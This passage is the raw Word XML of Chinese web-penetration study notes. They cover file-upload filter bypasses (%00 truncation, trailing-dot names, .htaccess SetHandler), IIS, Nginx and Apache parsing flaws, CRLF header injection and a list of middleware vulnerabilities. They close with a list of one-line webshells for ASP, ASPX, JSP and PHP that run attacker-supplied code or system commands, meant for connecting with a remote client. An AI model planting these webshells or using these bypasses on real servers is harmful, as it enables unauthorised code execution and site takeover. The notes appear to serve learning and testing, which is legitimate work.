    <w:p w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103">
      <w:r>
        <w:t>2.特殊文件名绕过</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103">
      <w:r>
        <w:t xml:space="preserve">  在Windows下有一个特性就是如果文件后缀以点‘.’或者空格‘ ’结尾的后缀 名时，系统在保存文件时会自动去除点和空格。但要注意 Unix/Linux 系统没有 这个特性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为有些服务器端的后缀名检测是取文件名最后一个</w:t>
      </w:r>
      <w:r>
        <w:t>.后面的字符串，拿这个字符串与黑名单列表对比</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103"/>
    <w:p w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103">
      <w:r>
        <w:t>3. 0x00截断绕过</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件名后缀有一个</w:t>
      </w:r>
      <w:r>
        <w:t>%00字节，可以截断某些函数对文件名的判断。在许多语言函 数中，处理字符串的函数中0x00被认为是终止符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如</w:t>
      </w:r>
      <w:r>
        <w:t>: 网站上传函数处理xxx.asp%00.jpg时，首先后缀名是合法的jpg格式，可以 上传，在保存文件时，遇到%00字符丢弃后面的 .jpg，文件后缀最终保存的后缀 名为xxx.asp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="007F7103"/>
    <w:p w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:t>IS6.0有两个解析漏洞，一个是如果目录名包.asp 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字符串，那么这个目录下所有的文 件都会按照 asp 去解析。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chaoasp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/1.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为文件名中有</w:t>
      </w:r>
      <w:r>
        <w:t>asp字样，所以该文件夹下的1.jpg文件打开时，会按照asp文件去解析执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B"/>
    <w:p w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另一个是只要文件名中含有</w:t>
      </w:r>
      <w:r>
        <w:t>.asp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会优先按 asp 来解析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B"/>
    <w:p w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:t>IIS7.0/7.5是对php解析时有一个类似于Nginx的解析漏洞， 对任意文件名只要在URL后面追加 上字符串“/任意文件名.php”就会按照 php 的方式去解析 。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例子</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ：  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>”http://www.baidu.com/upload/chao/1.jpg/chao.php</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种情况下访问</w:t>
      </w:r>
      <w:r>
        <w:t>1.jpg，该文件就会按照php格式被解析执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B"/>
    <w:p w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:t>3.Nginx解析漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个是对任意文件名，在后面添加</w:t>
      </w:r>
      <w:r>
        <w:t>/任意文件名.php的解析漏洞，比如原本文件名是 test.jpg， 可以添加为 test.jpg/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>x.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 进行解析攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一种是对低版本的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nginx 可以在任意文件名后面添加%00.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
      <w:r>
        <w:t>127.0.0.1/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-loads/load/chao.jpg%00.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么</w:t>
      </w:r>
      <w:r>
        <w:t>chao.jpg也就被当作php格式文件执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7103" w:rsidRDefault="00972178" w:rsidP="007F7103">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId88" w:history="1">
        <w:r w:rsidR="007F7103">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://paper.seebug.org/219/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00BC3FCD" w:rsidRDefault="00BC3FCD" w:rsidP="007F7103">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BC3FCD" w:rsidRDefault="00BC3FCD" w:rsidP="00BC3FCD">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>htaccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>攻击</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC3FCD" w:rsidRDefault="00BC3FCD" w:rsidP="00BC3FCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>建一个.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>htaccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 文件，里面的内容如下：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FilesMatch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pino</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SetHandler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> application/x-httpd-php</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FilesMatch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC3FCD" w:rsidRDefault="00BC3FCD" w:rsidP="00BC3FCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>这个时候就上传一个文件名字是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pino</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，这个时候我们上传一个文件名字叫做</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pino</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>的文件，不要后缀名，然后里面是一句话木马，用菜刀连接，可以成功！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC3FCD" w:rsidRDefault="00BC3FCD" w:rsidP="00BC3FCD">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1loh5"/>
        </w:rPr>
        <w:t>0人点赞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC3FCD" w:rsidRDefault="00972178" w:rsidP="00BC3FCD">
      <w:hyperlink r:id="rId89" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="00BC3FCD">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>Web安全</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00BC3FCD" w:rsidRDefault="00BC3FCD" w:rsidP="00BC3FCD">
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>作者：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pino_HD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t>链接：https://www.jianshu.com/p/5a4e4c0904f5</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>来源：简书</w:t>
      </w:r>
      <w:r>
        <w:br/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BC3FCD" w:rsidRPr="00BC3FCD" w:rsidRDefault="00BC3FCD" w:rsidP="007F7103"/>
    <w:p w:rsidR="00126765" w:rsidRDefault="00126765" w:rsidP="00126765">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编辑器漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A3401" w:rsidRPr="002A3401" w:rsidRDefault="002A3401" w:rsidP="002A3401">
      <w:r w:rsidRPr="002110F6">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>https://bbs.ichunqiu.com/forum.php?mod=viewthread&amp;tid=6419&amp;highlight=%E7%BC%96%E8</w:t>
      </w:r>
      <w:r w:rsidRPr="002A3401">
        <w:t>%BE%91%E5%99%A8%E6%BC%8F%E6%B4%9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F5C5C53" wp14:editId="0E6B590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274310" cy="215455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401" w:rsidRPr="002A3401" w:rsidRDefault="007A3227" w:rsidP="002A340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2BD03B" wp14:editId="05E3B2C4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2495550</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="364617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765" w:rsidRDefault="00126765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7A3227">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中间件漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F922B5" w:rsidRDefault="00972178" w:rsidP="00F922B5">
      <w:hyperlink r:id="rId92" w:history="1">
        <w:r w:rsidR="00F922B5" w:rsidRPr="003B6A56">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.freebuf.com/articles/web/192063.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F922B5" w:rsidRPr="00F922B5" w:rsidRDefault="00F922B5" w:rsidP="00F922B5"/>
    <w:p w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="007A3227">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A3227">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidR="009B1D8E">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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PUT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短</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F922B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>文件名猜解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922B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3、远程代码执行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lastRenderedPageBreak/>
        <w:t>4、解析漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F922B5" w:rsidRPr="00F922B5" w:rsidRDefault="00F922B5" w:rsidP="007A3227">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pP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 6.0 在处理含有特殊符号的文件路径时会出现逻辑错误，从而造成文件解析漏洞。这一漏洞有两种完全不同的利用方式：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/test.asp/test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该目录中的任何文件都被 IIS 当作 asp 程序执行（特殊符号是“/”）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A538A2" w:rsidRDefault="00A538A2" w:rsidP="00A538A2">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/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asp;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虽然该文件真正的后缀名是 “.jpg”，但由于含有特殊符号</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">;”，仍会被 IIS </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>当做</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> asp 程序执行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A538A2" w:rsidRDefault="00A538A2" w:rsidP="00A538A2">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pP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7.5 文件解析漏洞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jpg/.php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URL 中文件后缀是 .php ，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便无论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该文件是否存在，都直接交给 php 处理，而 php 又默认开启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cgi.fix_pathinfo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,会对文件进行“修理”，可谓“修理”？举个例子，当 php 遇到路径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时，若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不存在，则会去掉最后的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，然后判断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是否存在，若存在，则把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当作文件。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若有文件 test.jpg ，访问时在其后加 /.php ，便可以把 “test.jpg/.php” 交给 php ，php 修理文件路径 “test.jpg/.php” 得到 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test.jpg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 ，该文件存在，便把该文件作为 php 程序执行了。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38A2" w:rsidRPr="00A538A2" w:rsidRDefault="00A538A2" w:rsidP="007A3227">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>eblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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SSRF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任意文件上传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war后门文件部署</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F922B5" w:rsidRPr="00F922B5" w:rsidRDefault="00F922B5" w:rsidP="00126765">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1D8E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>omcat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远程代码执行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:rsidR="00F922B5" w:rsidRPr="00F922B5" w:rsidRDefault="00F922B5" w:rsidP="00126765">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p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rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Jboss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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:rsidR="00F922B5" w:rsidRPr="00F922B5" w:rsidRDefault="00F922B5" w:rsidP="00126765">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F922B5" w:rsidRDefault="00F922B5" w:rsidP="001267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ginx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文件解析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CRLF注入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目录穿越</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F922B5" w:rsidRPr="009B1D8E" w:rsidRDefault="00F922B5" w:rsidP="00126765">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Apache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解析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:rsidR="00F922B5" w:rsidRPr="009B1D8E" w:rsidRDefault="00F922B5" w:rsidP="00126765">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A3227" w:rsidRDefault="00B5008B" w:rsidP="00B5008B">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>LRF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举个例子，一般网站会在HTTP头中用Location: http://baidu.com这种方式来进行302跳转，所以我们能控制的内容就是Location:后面的XXX某个网址。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所以一个正常的302跳转包是这样：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Location: http://www.sina.com.cn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但如果我们输入的是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http://www.sina.com.cn</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5008B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>%0a</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5008B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Set-cookie:JSPSESSID%3Dwooyun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注入了一个换行，此时的返回包就会变成这样： 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Location: http://www.sina.com.cn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Set-cookie: JSPSESSID=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B5008B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wooyun</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00B5008B" w:rsidRPr="00B5008B" w:rsidRDefault="00B5008B" w:rsidP="00B5008B"/>
    <w:p w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765"/>
    <w:p w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765"/>
    <w:p w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00126765"/>
    <w:p w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00126765"/>
    <w:p w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00126765"/>
    <w:p w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一句话脚本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t>ASP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t>&lt;%eval request ("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>")%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445"/>
    <w:p w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t># ASPX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t>&lt;%@ Page Language="Jscript"%&gt; &lt;%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>eval(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>Request.Item</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"],"unsafe");%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445"/>
    <w:p w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t># JSP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t>&lt;%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Runtime.getRuntime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>).exec</w:t>
      </w:r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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">"));%&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445"/>
    <w:p w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t># PHP -&gt; REQUEST是在网页端输入变量访问，POST则是通过工具连接，基于C/S架构</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t>&lt;?php @eval($_POST['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>']);?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t>&lt;?php eval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  # eval,使用php函数,如</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>phpinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t>&lt;?php system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# system,使用Linux系统命令,如ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F823C0" w:rsidRPr="00F823C0" w:rsidRDefault="00F823C0" w:rsidP="00091445">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>&lt;?php echo system($_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>GET[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>]);?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005474CB" w:rsidRDefault="005474CB" w:rsidP="00091445"/>
    <w:p w:rsidR="005474CB" w:rsidRDefault="005474CB" w:rsidP="00091445"/>
    <w:p w:rsidR="005474CB" w:rsidRDefault="005474CB" w:rsidP="005474CB">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ypass绕过</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005474CB" w:rsidRDefault="00972178" w:rsidP="005474CB">
      <w:hyperlink r:id="rId93" w:history="1">
        <w:r w:rsidR="00664EC7" w:rsidRPr="002B6A4B">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.t00ls.net/articles-46165.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00664EC7" w:rsidRDefault="00972178" w:rsidP="005474CB">
      <w:hyperlink r:id="rId94" w:history="1">
        <w:r w:rsidR="00664EC7" w:rsidRPr="002B6A4B">
          <w:rPr>
            <w:rStyle w:val="a4"/>
